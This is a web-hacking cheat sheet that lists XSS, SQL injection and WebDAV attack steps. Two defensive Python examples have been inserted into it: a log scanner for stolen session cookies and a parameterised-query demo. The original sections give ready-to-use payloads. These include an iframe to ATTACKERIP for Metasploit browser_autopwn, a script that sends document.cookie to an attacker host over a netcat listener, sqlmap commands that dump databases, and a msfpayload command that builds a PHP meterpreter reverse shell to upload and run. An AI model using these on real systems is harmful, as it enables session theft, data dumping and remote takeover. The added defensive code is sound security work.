WEB HACKING

  • All-in-one web tool:- http://yehg.net/lab/pr0js/misc/wsa.php?q
  • Via XSS:-
    • Exploiting the browser:-
      • setup metasploit auxiliary/server/browser_autopwn to listen for connection
      • post an IFrame tag on the vulnerable site: <iframe src="http://ATTACKERIP/URIPATH" height="0" width="0"></iframe>
    • Stealing Session cookies:-
      • setup a netcat listener: nc -lvp 80
      • Steal session cookies with the following: <script> new Image().src="http://ATTACKERIP/bogus.php?output="+document.cookie; </script> 
    • Bypassing Filters:-
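Defender's view of the cookie-stealing payload above. This is an added example, not part of the original cheat sheet: a small Python script that scans web server access logs for requests whose query string carries a session cookie (the `bogus.php?output=PHPSESSID=...` pattern that the injected `<script>` produces), and a second helper that checks a `Set-Cookie` header for the `HttpOnly` and `Secure` flags whose absence lets `document.cookie` read the session in the first place. The log lines, IP addresses, paths and cookie values are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format). Not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /bogus.php?output=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 404 209 "http://victim.example/page" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /img/logo.png HTTP/1.1" 200 5120 "http://victim.example/" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=PHPSESSID+timeout HTTP/1.1" 200 3020 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:30 +0000] "GET /track?c=JSESSIONID%3D9F2C1A%3B%20ASP.NET_SessionId%3Dq1w2e3 HTTP/1.1" 200 43 "-" "curl/8.0"
"""

# client, timestamp, method, request target and status from a Combined Log Format line
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A "name=value" pair whose name is a well-known session cookie. The "=" is
# required, so a search term that merely mentions PHPSESSID does not match.
COOKIE_PAIR = re.compile(
    r'(?i)\b(PHPSESSID|JSESSIONID|ASP\.NET_SessionId|sessionid|sid)=([^;&\s]+)'
)


def find_cookie_exfil(log_text):
    """Return one record per request whose query string contains session cookies."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group('target'))
        # parse_qs percent-decodes, so "%3D" becomes "=" before matching
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                names = [c.group(1) for c in COOKIE_PAIR.finditer(value)]
                if names:
                    hits.append({
                        'client': m.group('client'),
                        'time': m.group('time'),
                        'path': parts.path,
                        'param': param,
                        'cookies': names,
                    })
    return hits


def missing_cookie_flags(set_cookie_header):
    """List the flags a session cookie should carry but this Set-Cookie header lacks."""
    attrs = {a.strip().split('=', 1)[0].lower()
             for a in set_cookie_header.split(';')[1:]}
    missing = []
    if 'httponly' not in attrs:
        missing.append('HttpOnly')  # without it, document.cookie exposes the session
    if 'secure' not in attrs:
        missing.append('Secure')    # without it, the cookie travels over plain HTTP
    return missing


if __name__ == '__main__':
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['path']} param={hit['param']} "
              f"cookies={','.join(hit['cookies'])}")
    print('missing flags:', missing_cookie_flags('PHPSESSID=abc123; Path=/'))
```

The match is on the decoded parameter value rather than the raw URL, so the usual percent-encoding of `;` and `=` does not hide the cookie string; a request that only mentions the cookie name (line 3 of the sample) is deliberately not reported. In practice the log scan is a compensating control; setting `HttpOnly` on the session cookie is what stops this particular payload from reading it.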
  • Via SQL Injection:-
    • Via GET:-
      • show databases: ./sqlmap -u http://www.example.com/index.php?id=1 --dbs
      • show tables: ./sqlmap -u http://www.example.com/index.php?id=1 -D <database> --tables
      • show data: ./sqlmap -u http://www.example.com/index.php?id=1 -D <database_name> -T <table_name> --dump
    • Via POST:-
      • show databases: ./sqlmap -u http://www.example.com/logon.asp --data "user=&pass=&submit=" --dbs
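What sqlmap is exploiting in the `index.php?id=1` case above, and the fix, as an added example that is not part of the original cheat sheet. The script builds an in-memory SQLite table (constructed data) and shows the same lookup written three ways: the request parameter pasted into the SQL text, the parameter bound as a query argument, and the bound query behind an integer check. The table, rows and function names are assumptions for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data: a users table with three rows."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)')
    conn.executemany('INSERT INTO users VALUES (?, ?, ?)', [
        (1, 'alice', 'alice@example.test'),
        (2, 'bob', 'bob@example.test'),
        (3, 'carol', 'carol@example.test'),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """The injectable pattern: the request parameter becomes part of the SQL text."""
    query = f"SELECT id, name FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Bound parameter: the driver sends the value separately, it is never parsed as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Defence in depth: reject anything that is not a plain non-negative integer."""
    if not str(user_id).isdigit():
        raise ValueError('id must be an integer')
    return lookup_safe(conn, int(user_id))


if __name__ == '__main__':
    conn = make_db()
    for value in ('1', '1 OR 1=1'):
        print(f'id={value!r}')
        print('  concatenated:', lookup_vulnerable(conn, value))
        print('  parameterised:', lookup_safe(conn, value))
```

With the tautology as input the concatenated query returns every row, which is the kind of behaviour sqlmap's `--dbs`/`--dump` automation builds on; the parameterised query compares the literal string against the integer column and returns nothing, and the validated version rejects it before any query runs.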
  • Via WebDAV:-
    • Download and run Ryan Linn's WebDAV test from here
    • create a payload in an allowed format, e.g. PHP: msfpayload php/meterpreter/reverse_tcp LHOST=ATTACKERIP R | msfencode -o meterpreter.php
    • start a Metasploit reverse handler
    • upload the malicious payload to the target server via FTP, SSH, PHP, WebDAV (dave), RFI etc.
    • browse to the file http://target/meterpreter.php